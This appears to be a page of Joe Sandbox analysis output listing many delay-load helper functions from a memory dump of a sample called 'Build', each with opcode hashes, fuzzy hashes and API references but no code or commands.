Opcode Fuzzy Hash: 315015a7864037918ad8fc517bdefa59d8fcab62e7034f4a5eca87cdefbb2900
Instruction Fuzzy Hash: 78B0128A35D302AC3114B1995D17D3F014CD0C0F293318D3AF509C1280E4645C080332

Function 009406F1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ee49fb03d95abb97a3fb91a5388828aefce9ec2f7fefde1ddb13082700fab20c
Instruction ID: 0599151d1c6f1186d01e0fd3a0e58b2533bdc5dc8ee543e5a992a824a6f08b65
Opcode Fuzzy Hash: ee49fb03d95abb97a3fb91a5388828aefce9ec2f7fefde1ddb13082700fab20c
Instruction Fuzzy Hash: 72B0128635D202EC3118B1E95D17D3F014CD0C0F29331CD3AF509C1280E4645C0C0332

Function 009406FB Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a0e9337d3306ece94c1dac0e5e19e1b0e953404a8c698c6b0eeb7f45c312db72
Instruction ID: b60dfb72a46281312b7c9e5a170656e3b7dcc820ab47d1caddef4039663ed47a
Opcode Fuzzy Hash: a0e9337d3306ece94c1dac0e5e19e1b0e953404a8c698c6b0eeb7f45c312db72
Instruction Fuzzy Hash: 44B0129635D202AC3114B1995D17D3F014CC0C1B29331CD3AF909C1180E4645C080332

Function 009406E7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 212ecd6a790bf5dfa7f4a7a6d3c5817be3b7f469c6dd0e9fe97aa387b00cea1c
Instruction ID: 89cb0a38f2189d7496fecd7f7452ec3f1b689904bbaf1d1db55a53b87cb7d87e
Opcode Fuzzy Hash: 212ecd6a790bf5dfa7f4a7a6d3c5817be3b7f469c6dd0e9fe97aa387b00cea1c
Instruction Fuzzy Hash: 06B0128635D202AC3118B1995E17D3F014CD0C0B29331CD3AF909C1280E4745C0D0332

Function 0094067C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4247998b117d34a67130e7a36f2d2138e55c05c5104e52e288e0b5b4d2e54131
Instruction ID: fae674e4831a711ecc5620076690f74be5ea71fe2c7bb12d5201bf9cd3940c52
Opcode Fuzzy Hash: 4247998b117d34a67130e7a36f2d2138e55c05c5104e52e288e0b5b4d2e54131
Instruction Fuzzy Hash: B3B0128675D202BD312471955D17C3F010CD0C0F293318E3AF505C0080A4745C080232

Function 00940719 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c02192d88398ba2594c45c6257d873836c9262b1e7fe52d4ca7c45685a02b2e2
Instruction ID: a26a61b4f4fabb85818804ff24fbf1bd8366d0140da33509d3e2a15a1b13a38c
Opcode Fuzzy Hash: c02192d88398ba2594c45c6257d873836c9262b1e7fe52d4ca7c45685a02b2e2
Instruction Fuzzy Hash: F9B0129635D202AC3114B19A5D17D3F014CD0C0F293318D3AF509C1180E4645C080332

Function 0094070F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9ad2d481632dc7a9c6681c6a70d2a101d1d6382106d1ce44c29a734a6b719a7b
Instruction ID: 001d0edd60b12333e934e1c5a87c4e814a3278baf0f238d55a52351ee8e15d52
Opcode Fuzzy Hash: 9ad2d481632dc7a9c6681c6a70d2a101d1d6382106d1ce44c29a734a6b719a7b
Instruction Fuzzy Hash: A7B0129635D202AC3114B1995E17D3F014CC0C0B293318D3AF909C1180E4645D090332

Function 0094072D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 708013b448729bea73ad4d2937942489be23874eb865e0045cf718dc6aad24a4
Instruction ID: 0b19bb80b0724b3381e4d6536a6c7aa87d775a0e8cc205c782a503944443b441
Opcode Fuzzy Hash: 708013b448729bea73ad4d2937942489be23874eb865e0045cf718dc6aad24a4
Instruction Fuzzy Hash: 8AB0129635E302AC3254B2995D17D3F014CC0C0B293318E3EF509C1180E4685C480332

Function 0094075F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0979035e0cdde893238a461ce0a591e1a06778a189c0751d632ecd6b8348d7fc
Instruction ID: cdedfdfa10254740daedb7a02ce6c22f1ad762ca064a2fed01f9033c86242d19
Opcode Fuzzy Hash: 0979035e0cdde893238a461ce0a591e1a06778a189c0751d632ecd6b8348d7fc
Instruction Fuzzy Hash: 85B0129636D202AC3114F1995E17D3F01CCC0C0B2D3318D3AF909C2180E4645C090332

Function 009408C4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009408A7

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 75a79ed674e34a689f05ca5e9e7f0901a0dc9264a1180f785a0838725ea3dd07
Instruction ID: d7a340351ef870d3a6dcf61a989205ca475566156f3f5942e29569b03ff87441
Opcode Fuzzy Hash: 75a79ed674e34a689f05ca5e9e7f0901a0dc9264a1180f785a0838725ea3dd07
Instruction Fuzzy Hash: 4EB0128235C300AC3208B1895D52D3E024CC0C0B25330892EF608C13C2F4645C8C6332

Function 009408CE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009408A7

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6d34e4f5e8cde70507f7e21a2037cfc88fafd87a410f0f055d3dda135cd79f91
Instruction ID: d840e1165b670344573a1664985f39d7afa7252807e802e8a06a9b6abcb03d7c
Opcode Fuzzy Hash: 6d34e4f5e8cde70507f7e21a2037cfc88fafd87a410f0f055d3dda135cd79f91
Instruction Fuzzy Hash: 6CB0128239C300AC3108B1895D12E3E024CD0C0B25330882EF608C1382F4645C481332

Function 009408F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009408A7

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e7ce6458ce2eef233a5ae1a54d07b82c7cecaf69506f7b48cc8d2ede3e8b928e
Instruction ID: a35e4cb8144b7835ad6808f58826a146a9054711ce72298233de6bdaa9af5af7
Opcode Fuzzy Hash: e7ce6458ce2eef233a5ae1a54d07b82c7cecaf69506f7b48cc8d2ede3e8b928e
Instruction Fuzzy Hash: 62B0128236C200BC3108B1899D02E3E024CD0C0B253308A2FF609C1282F4655C481332

Function 009409EA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009409FC

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 299a1b65ec50a868a1d1ab396fbedb10469acdfa94a3b22580b17677a89c108a
Instruction ID: b9248e5a9e11c1ab1c3ffd85c7e11d406d7b2941e07425a4e0f21a79320a8fa6
Opcode Fuzzy Hash: 299a1b65ec50a868a1d1ab396fbedb10469acdfa94a3b22580b17677a89c108a
Instruction Fuzzy Hash: D1B012C639C201FC3104B189AD12C36410CC8C0B2DB30C93AF604C408298755C090331

Function 00940A84 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00940A5D

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f6a3599fa1b8f1ba3a81fdff171222555d3a937ec6bfdd827fcc7166dba7b4ba
Instruction ID: dd329ffbe7f5e958c7c75f5ff94916e72b08407adb7692f3adf0ec1873276be1
Opcode Fuzzy Hash: f6a3599fa1b8f1ba3a81fdff171222555d3a937ec6bfdd827fcc7166dba7b4ba
Instruction Fuzzy Hash: 66B012C17AC300FC3348B1D99C2AD36018CD0C0B25330892BF508C11C0D4745C4D0331

Function 00940A8E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00940A5D

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: eaa7be3e6d3cbe5cb8e1013581b35de69b43efa16d5244cd1552a1055d94f7a4
Instruction ID: 4cf05626d231761e86d9c5a7a311e677b74f5cf59363b07c2f13d35dc18a9728
Opcode Fuzzy Hash: eaa7be3e6d3cbe5cb8e1013581b35de69b43efa16d5244cd1552a1055d94f7a4
Instruction Fuzzy Hash: DFB012C179C300FC3208B1D99C2AD36018CD0C0B25330C82BF908C21C0D4745C0D0331

Function 00940A05 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009409FC

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 59948ce540003fef9377c2df1a7f9f93ac9c6bf526cfec26a06e54e6a3ba75ed
Instruction ID: ae6af2d781031fe49f8864dc19bf6e29311e6df0d3160b297c5e4be2ecfed37c
Opcode Fuzzy Hash: 59948ce540003fef9377c2df1a7f9f93ac9c6bf526cfec26a06e54e6a3ba75ed
Instruction Fuzzy Hash: A4B012C139C300EC3204F199EC12E36014CC0C0B257308A3AF508C12C1D4755C4C1331

Function 00940A0F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009409FC

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0003c45d9ae56067bf181176f1a2b5fa6341373329e727cd884ff9db814b41bc
Instruction ID: 3a80b98e1daaf7b54888a6ddd102c34752c64e124c545d44631fa41aa3734fac
Opcode Fuzzy Hash: 0003c45d9ae56067bf181176f1a2b5fa6341373329e727cd884ff9db814b41bc
Instruction Fuzzy Hash: 36B012C13AC200EC3104F199ED12E37014CC0C0B25730C93AF608C5181D4755C0D0331

